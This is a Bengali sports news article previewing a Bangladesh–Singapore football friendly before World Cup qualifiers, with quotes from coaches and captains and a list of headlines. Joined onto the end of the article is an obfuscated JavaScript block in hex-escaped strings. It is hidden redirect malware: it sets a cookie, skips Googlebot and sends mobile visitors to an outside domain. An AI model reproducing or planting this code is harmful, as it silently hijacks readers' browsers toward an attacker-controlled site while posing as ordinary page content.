for Add

লক্ষ্য শুধুই ‘ভালো খেলা’

mamunulনিজস্ব প্রতিবেদক: সরাসরি বিশ্বকাপ বাছাই। বাংলাদেশের ফুটবলের জন্য কম কথা নয়। বিশ্বকাপ বাছাইয়ের আগে তাই যে কোন প্রীতিম্যাচই বেশ গুরুত্ববহণ করে। তেমনই গুরুত্ব নিয়ে বাংলাদেশের সামনে উপস্থিত হয়েছে সিঙ্গাপুরের বিপক্ষে প্রীতি ম্যাচ। শনিবার বঙ্গবন্ধু জাতীয় স্টেডিয়ামটিতে অনুষ্ঠিতব্য এই ম্যাচে বাংলাদেশের একমাত্র লক্ষ্য শুধুই ভালো খেলা। পূর্ণ শক্তির দল নিয়ে আসা সিঙ্গাপুর, প্রীতি ম্যাচ হলেও আক্রমণাত্মক খেলে ভাল ফল আদায় করে মাঠ ছাড়ার লক্ষ্য থাকছে তাদেরও।

Previewশনিবার বঙ্গবন্ধু জাতীয় স্টেডিয়ামে বিকেল ৪টায় সিঙ্গাপুরের বিপক্ষে প্রথম প্রীতি ম্যাচটি খেলতে নামবে বাংলাদেশ। বিশ্বকাপ বাছাইয়ের আগে আরও একটি প্রীতি ম্যাচ খেলবে বাংলাদেশ। ওই ম্যাচটি অনুষ্ঠিত হবে ২ জুন আফগানিস্তানের বিপক্ষে, একই ভেন্যুতে একই সময়ে। এরপর বিশ্বকাপ বাছাই পর্বের ম্যাচে ১১ জুন কিরগিজস্তান ও ১৬ জুন তাজিকিস্তানের মুখোমুখি হবে লাল-সুবজ জার্সিধারীরা।

এই দুটি প্রীতি ম্যাচের পারফরম্যান্সের ভিত্তিতেই নির্ধারণ করা হবে বিশ্বকাপ বাছাইপর্বের প্রথম দুই ম্যাচের চূড়ান্ত দল। স্বভাবতই বাংলাদেশের লক্ষ্য সিঙ্গাপুরের বিপক্ষে ভাল খেলা। অপরদিকে, পূর্ণ শক্তির দল নিয়ে এসেছে সিঙ্গাপুরও। প্রীতি ম্যাচ হলেও আক্রমণাত্মক খেলে ভাল ফল আদায় করে মাঠ ছাড়ার লক্ষ্য থাকছে তাদেরও।

প্রীতি ম্যাচটিকে সামনে রেখে শুক্রবার দুদলের কোচ ও অধিনায়কের উপস্থিতিতে সংবাদ সম্মেলন অনুষ্ঠিত হয়েছে বাংলাদেশ ফুটবল ফেডারেশন (বাফুফে) ভবনে। বাংলাদেশ দলের পক্ষে ম্যানেজার আমিরুল ইসলাম বাবু, সহকারী কোচ সাইফুল বারী টিটু, টিম লিডার ইকবাল খান ও অধিনায়ক মামুনুল ইসলাম উপস্থিত ছিলেন। প্রধান কোচ লোডভিক ডি ক্রুইফ অসুস্থ থাকায় সংবাদ সম্মেলনে উপস্থিত হতে পারেননি। সিঙ্গাপুর দলের পক্ষে কোচ ব্রেন্ড স্টাঞ্জ ও অধিনায়ক মোহাম্মদ শাহরিল বিন ইসহাক দলের প্রস্তুতি সম্পর্কে তুলে ধরেছেন।

পূর্ব ঘোষিত ৩২ সদস্যের প্রাথমিক দল থেকে ইতোমধ্যে ২৩ সদস্যের চূড়ান্ত দল ঘোষণা করা হয়েছে বাংলাদেশের। চূড়ান্ত দলে চমক হিসেবে স্থান পেয়েছেন ফিলিপাইনে খেলা জার্মান প্রবাসী রিয়াসাত ইসলাম। ৩ বছর পর দল থেকে বাদ পড়েছেন ফরওয়ার্ড তকলিস আহমেদ। গোলরক্ষক হিসেবে চূড়ান্ত দলে আছেন মাজহারুল ইসলাম ও রাসেল মাহমুদ। শারীরিক অসুস্থতার কারণে জাহিদ হোসেন নেই প্রথম ম্যাচের চূড়ান্ত দলে।

অনুশীলনের পাশাপাশি খেলোয়াড়দের ফিটনেস যাচাইয়ে প্রীতি ম্যাচগুলো গুরুত্বপূর্ণ বলেই মনে করছেন সাইফুল বারী টিটু। তিনি বলেছেন, ‘অনেকে লিগে নিয়মিত খেলেনি। আবার অনেকে টানা খেলে ক্লান্ত হয়ে পড়েছে। কার কতটুকু ফিটনেস আছে তা অনুশীলনে আমরা দেখার চেষ্টা করেছি। তবে অনুশীলনের ফিটনেস ও ম্যাচ ফিটনেস এক বিষয় নয়। তাই প্রীতি ম্যাচে আমরা সবাইকে খেলাতে চাই। যাতে বাছাইপর্বের দলের জন্য ম্যাচ ফিটনেসটা যাচাই করে নেওয়া যায়।’

বিশ্বকাপ বাছাইয়ে কি ধরনের কৌশল গ্রহণ করা হবে তার একটা মহড়া হবে প্রীতি ম্যাচে। সেই কৌশলে সফল হলে ১১ ও ১৬ জুন কিরগিজস্তান ও তাজিকিস্তানের বিপক্ষে প্রথম দুই ম্যাচে একই কৌশল নির্ধারণ করবে বাংলাদেশ।

Bangladesh-National-Football-Team-4-(1)সর্বশেষ এএফসি অনূর্ধ্ব-২৩ বাছাইপর্বের খেলায় বাংলাদেশ দল বাজে খেলেছে। অবশ্য এর আগেই বঙ্গবন্ধু গোল্ডকাপে দারুণ নৈপুণ্য দেখিয়েছিলেন মামুনুলরা। সাইফুল বারী টিটু মনে করছেন অনূর্ধ্ব-২৩ দলের সঙ্গে জাতীয় দলের শক্তিতে বেশ পার্থক্য আছে। সব মিলিয়ে প্রীতি ম্যাচে ভাল খেলতে চায় বাংলাদেশ।

সিঙ্গাপুরের বিপক্ষে ম্যাচে সুনির্দিষ্ট কোনো লক্ষ্য নির্ধারণ করতে চান না টিটু। তিনি বলেছেন, ‘প্রীতি ম্যাচে আমরা নিজেদের কৌশল নির্ণয়ে একটা পরীক্ষা-নিরীক্ষা করব। ভাল খেলাটাই আমাদের মূল লক্ষ্য।’ তবে ম্যাচ জিততে পারলে তা বাংলাদেশের জন্য ইতিবাচক হবে বলে মনে করছেন অধিনায়ক মামুনুল ইসলাম। তিনি বলেছেন, ‘সিঙ্গাপুর আমাদের চেয়ে র‌্যাঙ্কিংয়ে এগিয়ে আছে। তাদের হারাতে পারলে র‌্যাঙ্কিংয়ের মানদণ্ডে তা আমাদের জন্য ইতিবাচক হবে। খেলার জন্য পুরো দল ফিট আছে। আমি ইনজুরিতে ছিলাম। অনেকটা কাটিয়ে ওঠেছি। ফিটনেস লেভেল বুঝার জন্য প্রীতি ম্যাচ দুটি খুব গুরুত্বপূর্ণ।’

প্রীতি ম্যাচ হলেও ছেড়ে কথা বলবে না সিঙ্গাপুর। পূর্ণ শক্তির দল নিয়েই তারা বাংলাদেশে এসেছে। সম্প্রতি মালয়েশিয়ান কাপের ফাইনালে যে দল খেলেছে সেই দলের প্রায় সবাই রয়েছেন এই দলটিতে। এই ম্যাচে আক্রমণাত্মক কৌশলে খেলবেন বলে জানিয়েছেন সিঙ্গাপুর কোচ ব্রেন্ড স্টাঞ্জ। তিনি বলেছেন, ‘আমরা কাউকে খাটো করে দেখছি না। তাই পূর্ণ শক্তির দল নিয়ে আমরা এসেছি। নিজস্ব কৌশলে আমরা খেলব। সেক্ষেত্রে আমাদের চেষ্টা থাকবে আক্রমণাত্মক খেলা। তবে আমরা এই ম্যাচের জন্য খুব বেশি অনুশীলন করতে পারিনি। এখানেই কিছুটা ঘাটতি থেকে যাচ্ছে।’

বাংলাদেশের বিরাজমান গ্রিষ্মের তাপদাহ নিয়ে খুব বেশি উদ্বিগ্ন নন সিঙ্গাপুরের কোচ। তিনি বলেছেন, ‘কন্ডিশনটা খুব বেশি সমস্যা নয়। কারণ, ভাল দল সব কন্ডিশনেই ভাল খেলতে পারে।’

অধিনায়ক শাহরিল ইসহাকের ক্যারিয়ারে ১২১ তম ম্যাচ এটি। অধিনায়কত্ব করছেন ২০১০ সাল থেকে। তারও লক্ষ্য বিশ্বকাপ বাছাইপর্বের আগে নিজেদের প্রস্তুত করে নেওয়া। তিনি বলেছেন, ‘বিশ্বকাপ বাছাই পর্বে শক্তিশালী দলগুলোর বিরুদ্ধে খেলার আগে নিজেদের প্রস্তুত করে নিতে এই ম্যাচ আমাদের জন্য গুরুত্বপূর্ণ। আমরা আক্রমণাত্মক ও দৃষ্টিনন্দন ফুটবল খেলব। তবে বাংলাদেশকেও খাটো করে দেখার কোনো সুযোগ নেই।’var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

ব্রাজিলের বিশ্বকাপ দলে নেইমার, জল্পনার অবসান জমকালোভাবে ৯০ বছর পূর্তি উৎসব করবে মোহামেডান ইতিহাস গড়ার অপেক্ষায় রোনালদো! রাজশাহীতে বিকেএসপি কাপ বক্সিং চ্যাম্পিয়নশিপ শুরু কুল-বিএসপিএ অ্যাওয়ার্ড: সংক্ষিপ্ত তালিকায় হামজা, ঋতুপর্ণা ও আমিরুল বসুন্ধরা কিংসের ষষ্ঠ শিরোপা জয় বর্ণাঢ্য আয়োজনে শেষ হলো স্বাধীনতা দিবস রোলার স্কেটিং টুর্নামেন্ট প্রথম প্যারা স্পোর্টস কার্নিভাল শুরু এক যুগ পর প্রথম বিভাগ ব্যাডমিন্টন লিগ শুরু স্বাধীনতা দিবস রোলার স্কেটিং কাল শুরু কিউট-ডিআরইউ টিটিতে রাকিব চ্যাম্পিয়ন স্টোকস-রুটদের ফিল্ডিং কোচ নারী দলের সারাহ বিশ্বকাপ জয়ের স্বপ্নে বিভোর কেইন কিউট-ডিআরইউ অ্যাথলেটিকসে বাতেন প্রথম ইসলামী বিশ্ববিদ্যালয় আন্তর্জাতিক দাবায় যদুনাথ চ্যাম্পিয়ন জুনিয়র টেনিস টুর্নামেন্ট কাল থেকে শুরু বিশ্বকাপে বয়স্ক কোচের রেকর্ড গড়তে যাচ্ছেন ডিক কিংস অ্যারেনায় ফাইনাল খেলবে না মোহামেডান! কিউট-ডিআরইউ দাবায় মোরসালিন চ্যাম্পিয়ন ব্রাদার্সকে হারিয়ে ফাইনালে মোহামেডান নেইমারকে নিয়েই বিশ্বকাপে ব্রাজিলের প্রাথমিক স্কোয়াড আর্জেন্টিনার ৫৫ সদস্যের প্রাথমিক দল ঘোষণা পাকিস্তানের বিপক্ষে ঐতিহাসিক জয়ে ক্রীড়া প্রতিমন্ত্রীর অভিনন্দন প্রথম টেস্টে পাকিস্তানকে ১০৪ রানে হারালো বাংলাদেশ শিরোপার আশা বাঁচিয়ে রাখলো ম্যানচেস্টার সিটি ৩৮৬ রানে অলআউট পাকিস্তান; ২৭ রানের লিড বাংলাদেশের পুনরায় বিএসপিএ সভাপতি রেজওয়ান, সাধারণ সম্পাদক আনন্দ শান্ত-মুমিনুলদের ব্যাটে প্রথম দিন বাংলাদেশের রোনালদোর আরেকটি বড় কীর্তি প্রচার বিমুখ এক ক্রীড়া অন্তপ্রাণ সংগঠক নতুন সভাপতি পাচ্ছে ক্রিকেটের আইন প্রণয়নকারী সংস্থা এমসিসি সাফের হ্যাটট্রিক মিশনে থাইল্যান্ডের পথে আফঈদারা নিউজিল্যান্ড টেস্ট দলে ফক্সক্রফট বায়ার্নকে বিদায় করে ফাইনালে পিএসজি আগামী বছর থেকে শিক্ষাক্ষেত্রে খেলাধুলা বাধ্যতামূলক করা হবে: ক্রীড়া প্রতিমন্ত্রী পাকিস্তানের বিপক্ষে টেস্টের আগে বাংলাদেশের প্রস্তুতি নিয়ে আত্মবিশ্বাসী সিমন্স ই-স্পোর্টসের বিশ্বমঞ্চে বাংলাদেশ বাংলাদেশ সিরিজের আগে পাকিস্তান সফর করবে অস্ট্রেলিয়া কুল-বিএসজেএ মিডিয়া কাপে চ্যাম্পিয়ন দীপ্ত টেলিভিশন মোহামেডানকে বাফুফের অবাক করা চিঠি তাইপেকে হারিয়ে সেমিতে নারী কাবাডি দল ঐতিহাসিক জয় নারী হকি দলের আচরণবিধি লঙ্ঘনে শাস্তি পেলেন নাহিদা ও শারমিন ব্রাজিলের বিশ্বকাপ জয়ের এটাই সঠিক সময় : কাফু সিরিজ নির্ধারণী ম্যাচে আজ ওয়ানডেতে বাংলাদেশ-নিউজিল্যান্ড মুখোমুখি সানিয়ায় এশিয়ান বিচ গেমস শুরু বাংলাদেশ ফুটবল দলের কোচ হতে পৌনে তিনশ আবেদন চ্যাম্পিয়ন বাংলাদেশের গ্রুপে স্বাগতিক ভারত ১১৪ বছর পর বিপর্যয়ে চেলসি ক্রীড়া উন্নয়নে বাংলাদেশ-চীন পথনকশা তৈরি করবে

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add